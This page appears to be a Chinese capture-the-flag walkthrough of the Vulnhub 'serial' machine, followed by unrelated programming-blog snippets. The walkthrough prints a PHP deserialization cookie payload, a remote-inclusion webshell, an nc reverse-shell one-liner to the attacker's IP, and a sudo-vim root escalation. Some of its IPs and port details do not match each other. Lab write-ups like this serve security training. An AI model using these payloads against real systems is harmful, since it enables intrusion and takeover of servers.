当前位置：首页 > news >正文

serial靶机教程

news 2025/11/21 18:56:31

靶机下载地址

https://download.vulnhub.com/serial/serial.zip

主机发现

arp-scan -l

端口扫描

nmap 192.168.229.131 -A

根据对⽐可知serial的⼀个ip地址为192.168.47.143

该靶机开启了22端⼝和80端⼝

对⽹站进⾏⼀个访问，⼤概意思为这是对新的cookie处理程序的测试版暂且搁置

目录扫描

dirb http://192.168.229.131

访问网站

发现⼀个zip⽂件

解压查看

index.php⽂件中包含user.class.php⽂件且对cookie中的user参数进⾏了序列化和base64编码

user.class.php⽂件包含log.class.php⽂件且定义了Welcome和User两个类并调⽤了

log.class.php⽂件中的handler函数

log.class.php定义了Log类和成员变量type_log且handler函数对变量进⾏了⽂件包含和输出

没有得到有用的信息

访问原⽹站,⽤Burpsuite抓包查看cookie

发现其为base64编码，对其进行解码

O:4:"User":2:{s:10:".User.name";s:3:"sk4";s:9:".User.wel";O:7:"Welcome":0:{}}7.

构造payload，尝试读取passwd⽂件

O:4:"User":2:{s:10:" User name";s:5:"admin";s:9:" User wel";O:3:"Log":1:{s:
8:"type_log";s:11:"/etc/passwd";}}

使⽤base64编码

Tzo0OiJVc2VyIjoyOntzOjEwOiIAVXNlcgBuYW1lIjtzOjU6ImFkbWluIjtzOjk6IgBVc2VyAHd
lbCI7TzozOiJMb2ciOjE6e3M6MTM6IgBMb2cAdHlwZV9sb2ciO3M6MTE6Ii9ldGMvcGFzc3dkIj
t9fQ==

获取shell

在本机写一个txt

<?php system($_GET['cmd'];?>

在创建一个木马文件

<?phpclass Log {private $type_log = "http://本机ip/1.txt";}class User {private $name = "admin";private $wel;function __construct() {$this->wel = new Log();}
}
$obj = new User();
echo base64_encode(serialize($obj));

访问php文件

在kali开启一个监听

反弹shell

?cmd=rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.229.132
+8888+>/tmp/f

反弹成功

提权

查看系统版本，内核版本

切换到根目录

cd /
ls

查看文件

cat credentials.txt.bak

使用远程连接使用之前扫出来的21端口

ssh sk4@192.168.229.131

尝试进入root

用sudo vim，进⼊到命令模式输⼊!bash

以下则是提权成功

serial靶机教程

靶机下载地址 https://download.vulnhub.com/serial/serial.zip 主机发现 arp-scan -l 端口扫描 nmap 192.168.229.131 -A 根据对⽐可知serial的⼀个ip地址为192.168.47.143 该靶机开启了22端⼝和80端⼝对⽹站进⾏⼀个访问，⼤概意思为这是对新的cookie处理程序…...

编程日记 2024/8/7 4:56:29

【Linux-MISC设备】

目录 1. MISC设备2. MISC蜂鸣器实验 1. MISC设备 MISC设备的主设备号为10.MISC设备会自动创建cdev，不需要再手动创建。MISC设备是基于platform的. MISC驱动的编写的核心就是初始化miscdevice结构体变量，然后用misc_register函数向内核注册，…...

编程日记 2024/8/7 4:54:27

【随笔】VRRP+MSTP

虚拟路由冗余协议（Virtual Router Redundancy Protocol，VRRP） 设计采用主备模式，将VRRP组内多个路由设备都映射为一个虚拟路由设备。一个VRRP组中只能由一台处于主控角色的路由器，可以有一个或多个备份角色的路由器。…...

编程日记 2024/8/7 4:53:26

vue 动态增删行，并form表单校验（附v2\v3）

Vue3 组件用的 ant 可以换成你们用，主要是form校验前端代码 <a-formref"formRef":model"formData":label-col-props"{ span: 5 }":wrapper-col-props"{ span: 17 }"><a-row><a-form-itemlabel"角色…...

编程日记 2024/8/7 4:52:25

计算机网络的基本概念

IP地址（Internet Protocol Address）是指在计算机网络中每个设备的唯一标识符。它用于区分不同设备并在网络中进行数据包的路由。我们平常所使用的IP地址主要版本： IPv4 格式: 由四个整数（0到255）组成，以点…...

编程日记 2024/8/7 4:51:24

Python 爬虫项目实战三：GitHub 用户信息抓取与分析

一、项目背景爬虫技术不仅限于获取网页内容，还可以用于获取和分析特定网站的用户信息。本文将演示如何使用Python编写爬虫程序，从GitHub网站抓取用户信息，并进行简单的数据分析。二、环境准备在开始之前，请确保你已经安装了…...

编程日记 2024/8/7 4:50:23

xtrabackup搭建MySQL 8.0 主从复制

xtrabackup搭建MySQL 8.0 主从复制安装MySQL 8.0.37安装xtrabackupGTIDs初始化从库参考：GTID概述GTID相较与传统复制的优势GTID自身存在哪些限制GTID工作原理简单介绍如何开启GTID复制GTID与传统模式建立复制时候语句的不同点传统复制GTID复制 GTID同步状态简单解析…...

编程日记 2024/8/7 4:49:22

Java程序员接单分享

作为一名Java程序员，这阵子通过承接些小型项目，我顺利跨过了月薪破万的门槛。这些项目虽小，却如同磨刀石般，让我在实战中发现了自身技术栈的棱角与不足，尤其是意识到了在Java这一浩瀚技术海洋中的诸多未知领域。我深知…...

编程日记 2024/8/7 4:48:21

【HarmonyOS NEXT星河版开发学习】小型测试案例01-今日头条置顶练习

个人主页→VON 收录专栏→鸿蒙开发小型案例总结基础语法部分会发布于github 和 gitee上面前言本系列可能是博客首发，鸿蒙开发星河版是一个全新的版本，由于参考视频较少鸿蒙开发不被重视导致csdn上面并没有全套的学习路线，…...

编程日记 2024/8/7 4:46:19

C语言----计算开机时间

计算开机时间实例说明编程实现计算开机时间，要求在每次开始计算开机时间时都能接着上次记录的结果向下记录。实现过程： 1. 在TC中创建一个C文件。 2. 引用头文件，代码如下: #include <stdio.h> 3. 定义结构体time，用来…...

编程日记 2024/8/7 4:44:18

批发行业进销存-登录适配 android 横竖屏幕源码CyberWinApp-SAAS 本地化及未来之窗行业应用跨平台架构

一、横竖屏切换的意义以下是移动端横屏竖屏可切换在进销存中的一些重要应用： a、数据录入与查看在录入商品信息、库存数量等大量数据时，横屏模式可以提供更宽阔的输入区域，减少输入错误。例如，在输入长串的商品编码或详细的商…...

编程日记 2024/8/7 4:43:17

js功能（1）

1、readonly 应用于元素：readonly 可以应用于 <input> 和 <textarea> 元素。用户界面表现：当元素设置为 readonly 时，用户不能更改输入框中的值，但可以选中和复制文本，且表单包含该输入字段的值可以被提交…...

编程日记 2024/8/7 4:42:12

微信小程序乡村医疗系统，源码、部署+讲解

目录摘要 Abstract 1 绪论 1.1 研究背景及意义 1.2 研究现状 1.3 研究内容 2 相关技术介绍 2.1 Java 语言 2.2 MySQL 数据库 2.3 Spring Boot 框架 2.4 B/S 结构 2.5 微信小程序 3 系统分析 3.1 可行性分析 3.1.1 经济可行性 3.1.2 技术可行性…...

编程日记 2024/8/7 4:41:11

完美解决pip命令版本冲突导致对应版本模块包无法安装的问题

解决步骤使用pip更新/降低指定模块包命令格式降低pip自身至指定版本的命令再次换源安装指定模块包在对 FasterNet 这篇论文源码复现过程中，我们首先需要安装相关依赖文件（ path/to/your/requirements.txt） -extra-index-url https://down…...

编程日记 2024/8/7 4:40:10

5.1-软件工程基础知识-软件工程概述

软件工程诞生原因了解早期的软件：主要是指采用个体工作方式实现的程序。第一次软件危机：20世纪60年代中期典型表现有软件质量低下、项目无法如期完成、项目严重超支等因为软件而导致的重大事故时有发生。软件工程的诞生：1968年在NATO会…...

编程日记 2024/8/7 4:39:09

极简聊天室-websocket版

再写一个极简聊天室的websocket版，在本例中，websocket仅用于服务器向客户端传输信息，客户端向服务器发送信息是传统的http post方式，用axios来实现的，当然websocket本身是支持双向通信，主要是为了方便跟前面…...

编程日记 2024/8/7 4:36:06

QT学生管理系统开发文档

目录第一章 UI界面设计与开发登录界面主界面 UI美化第二章数据库设计与开发数据库设计连接数据库数据库功能设计 sql语句设计查询所有学生数量查询第几页学生数据删除学生修改学生信息清空学生表添加单个用户删除单个用户修改用户权限查询所有用户…...

编程日记 2024/8/7 4:35:05

【五大海内外高校支持】2024年数字经济与计算机科学国际学术会议（DECS2024）

大会官网：www.icdecs.net 大会时间：2024年9月20-22日大会地点：中国-厦门截稿日期：详情见官网支持单位马来西亚理工大学北京科技大学经济管理学院南京信息工程大学马来西亚敦胡先翁大学大会嘉宾大会主席罗航…...

编程日记 2024/8/7 4:34:03

VS项目打包成lib库并使用

一、新建一个静态库项目一般要把项目设为Release模式二、添加文件将所需要打包的头文件、源文件添加到该静态库项目中三、生成项目生成成功后即可在Release文件夹出现找到相应的.lib文件四、使用静态库将静态库文件复制到项目文件夹中，然后在项目属性设…...

编程日记 2024/8/7 4:32:00

社交巨头与去中心化：解析Facebook在区块链的角色

区块链技术的兴起为多个行业带来了变革，而社交平台也正在经历这一波技术浪潮。作为全球最大的社交网络之一，Facebook（现名Meta Platforms）在区块链领域的探索展示了其如何应对去中心化趋势的挑战，并利用这一技术推动自…...

编程日记 2024/8/7 4:29:59

挑战杯推荐项目

“人工智能”创意赛 - 智能艺术创作助手：借助大模型技术，开发能根据用户输入的主题、风格等要求，生成绘画、音乐、文学作品等多种形式艺术创作灵感或初稿的应用，帮助艺术家和创意爱好者激发创意、提高创作效率。 - 个性化梦境…...

编程新知 2025/11/6 5:46:16

2025 后端自学UNIAPP【项目实战：旅游项目】6、我的收藏页面

代码框架视图 1、先添加一个获取收藏景点的列表请求【在文件my_api.js文件中添加】 // 引入公共的请求封装 import http from ./my_http.js// 登录接口（适配服务端返回 Token） export const login async (code, avatar) > {const res await http…...

编程新知 2025/11/17 10:04:26

ip子接口配置及删除

配置永久生效的子接口，2个IP 都可以登录你这一台服务器。重启不失效。永久的 [应用] vi /etc/sysconfig/network-scripts/ifcfg-eth0修改文件内内容 TYPE"Ethernet" BOOTPROTO"none" NAME"eth0" DEVICE"eth0" ONBOOT&q…...

编程新知 2025/10/26 5:04:25

三分算法与DeepSeek辅助证明是单峰函数

前置单峰函数有唯一的最大值，最大值左侧的数值严格单调递增，最大值右侧的数值严格单调递减。单谷函数有唯一的最小值，最小值左侧的数值严格单调递减，最小值右侧的数值严格单调递增。三分的本质三分和二分一样都是通过不断缩…...

编程新知 2025/11/16 22:43:03

Golang——9、反射和文件操作

反射和文件操作 1、反射1.1、reflect.TypeOf()获取任意值的类型对象1.2、reflect.ValueOf()1.3、结构体反射 2、文件操作2.1、os.Open()打开文件2.2、方式一：使用Read()读取文件2.3、方式二：bufio读取文件2.4、方式三：os.ReadFile读取2.5、写…...

编程新知 2025/11/16 22:43:14